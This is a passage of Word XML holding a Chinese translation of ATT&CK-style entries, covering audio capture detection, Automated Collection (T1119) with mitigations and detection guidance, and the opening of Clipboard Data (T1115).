    <w:p w14:paraId="62C33076" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术基于系统功能的滥用，无法通过预防性控制来轻松缓解其造成的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75271CAB" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7883CB59" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此</w:t>
      </w:r>
      <w:r>
        <w:t>技术可能很难检测到，因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>各不相同</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>相关</w:t>
      </w:r>
      <w:r w:rsidRPr="000158E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的遥测数据可能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并无用处</w:t>
      </w:r>
      <w:r>
        <w:t>，具体取决于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统</w:t>
      </w:r>
      <w:r>
        <w:t>的使用方式。</w:t>
      </w:r>
      <w:r w:rsidRPr="000158E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这些</w:t>
      </w:r>
      <w:r>
        <w:t>遥测数据</w:t>
      </w:r>
      <w:r w:rsidRPr="000158E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="000158E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为系统上发生的其他潜在恶意活动提供上下文。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731CFFA7" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0022511E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t>此技术使用相关的行为</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包括未知或异常</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来访问</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>麦克风</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>录音设备或录音软件，以及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>周期性地将包含音频数据的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r>
        <w:t>写入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>磁盘</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A88A048" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0096095B" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>自动化收集</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="0022511E" w14:paraId="39758879" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2679B250" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0022511E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0022511E">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>T1119</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25BA7DD5" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0022511E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0022511E">
              <w:t>技术：采集</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E7A14E4" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0022511E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0022511E">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C8057BB" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0022511E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0022511E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>系统要求</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>有权访问存储感兴趣信息的目录和文件。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52B25FCC" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0022511E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0022511E">
              <w:t>所需权限：用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2011FE29" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0022511E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0022511E">
              <w:t>数据源：文件监控，</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>丢失防御</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D5037B2" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0022511E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0022511E">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D015781" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="005E7F75" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6786EFFD" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一旦在系统或网络中建立，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就可以使用自动化技术来收集内部数据。方法包括使用脚本在特定时间间隔搜索</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>符合条件（</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如文件类型，位置或名称</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）的</w:t>
      </w:r>
      <w:r>
        <w:t>信息</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。此功能也可以内置到远程访问工具中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB1AE21" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该技术可以结合使用其他技术，例如文件和目录发现以及远程文件复制，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>识别和移动文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4171ED13" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2263"/>
        <w:gridCol w:w="7473"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00CC2814" w14:paraId="0EFE1C94" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="4AA0B783" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00CC2814" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CC2814">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7473" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="12ACEC9E" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00CC2814" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CC2814">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00EB6DEA" w14:paraId="67218B29" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="459B0F90" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00EB6DEA" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId230" w:history="1">
              <w:r w:rsidR="00A0413E" w:rsidRPr="00EB6DEA">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>敏感信息加密</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68B0F12F" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00EB6DEA" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00EB6DEA">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>敏感信息的加密和系统外存储可能是减轻文件收集影响的一种方法，但是如果入侵持续了很长时间并且攻击者能够通过其他方式发现和访问数据，则这种</w:t>
            </w:r>
            <w:r w:rsidRPr="00EB6DEA">
              <w:t>方法</w:t>
            </w:r>
            <w:r w:rsidRPr="00EB6DEA">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>可能没法阻止攻击者获取信息。对</w:t>
            </w:r>
            <w:r w:rsidRPr="00EB6DEA">
              <w:t>某些加密文档使用强密码可以阻止攻击者使用暴力破解技术来</w:t>
            </w:r>
            <w:r w:rsidRPr="00EB6DEA">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在</w:t>
            </w:r>
            <w:r w:rsidRPr="00EB6DEA">
              <w:t>线下破解密码。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00EB6DEA" w14:paraId="2E26D981" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="1219"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CE4A41A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00EB6DEA" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId231" w:history="1">
              <w:r w:rsidR="00A0413E" w:rsidRPr="00EB6DEA">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>远程数据存储</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A7824C1" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00EB6DEA" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00EB6DEA">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>敏感信息的加密和系统外存储可能是减轻文件收集影响的一种方法，但是如果入侵持续了很长时间并且攻击者能够通过其他方式发现和访问数据，则这种</w:t>
            </w:r>
            <w:r w:rsidRPr="00EB6DEA">
              <w:t>方法</w:t>
            </w:r>
            <w:r w:rsidRPr="00EB6DEA">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>可能没法阻止攻击者获取信息。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2372F817" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CA4561D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17883C27" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="004B3FA7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据所使用的方法，操作可</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>能</w:t>
      </w:r>
      <w:r w:rsidRPr="004B3FA7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包括</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>命令行界面上使用</w:t>
      </w:r>
      <w:r w:rsidRPr="004B3FA7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>批处理文件或脚本中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="004B3FA7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通用文件系统命令和参数。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一系列类似</w:t>
      </w:r>
      <w:r>
        <w:t>操作可能不正常，具体取决于系统和网络环境。</w:t>
      </w:r>
      <w:r w:rsidRPr="005A1E07">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>化</w:t>
      </w:r>
      <w:r w:rsidRPr="005A1E07">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>技术</w:t>
      </w:r>
      <w:r w:rsidRPr="005A1E07">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可与其他技术一起</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="005A1E07">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如分布处理数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>技术</w:t>
      </w:r>
      <w:r w:rsidRPr="005A1E07">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控过程中，</w:t>
      </w:r>
      <w:r>
        <w:t>如果发现异常进程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一次性</w:t>
      </w:r>
      <w:r>
        <w:t>打开</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多个</w:t>
      </w:r>
      <w:r>
        <w:t>文件并拷贝到文件系统上另外一个位置，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>则可能</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有</w:t>
      </w:r>
      <w:r>
        <w:t>自动收集行为发生</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。攻击者</w:t>
      </w:r>
      <w:r>
        <w:t>可能会使用带</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有内置功能的远程访问工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接与</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows API</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>交互以收集数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，也可以</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统管理工具（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows Management Instrumentation</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）来获取数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60785EAF" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0096095B" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>剪贴板数据</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="0022511E" w14:paraId="152415D4" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04D55A76" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0022511E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0022511E">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>T1115</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07FC1027" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0022511E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0022511E">
              <w:t>技术：采集</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C044CE1" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0022511E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0022511E">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>macOS</w:t>
            </w:r>
          </w:p>
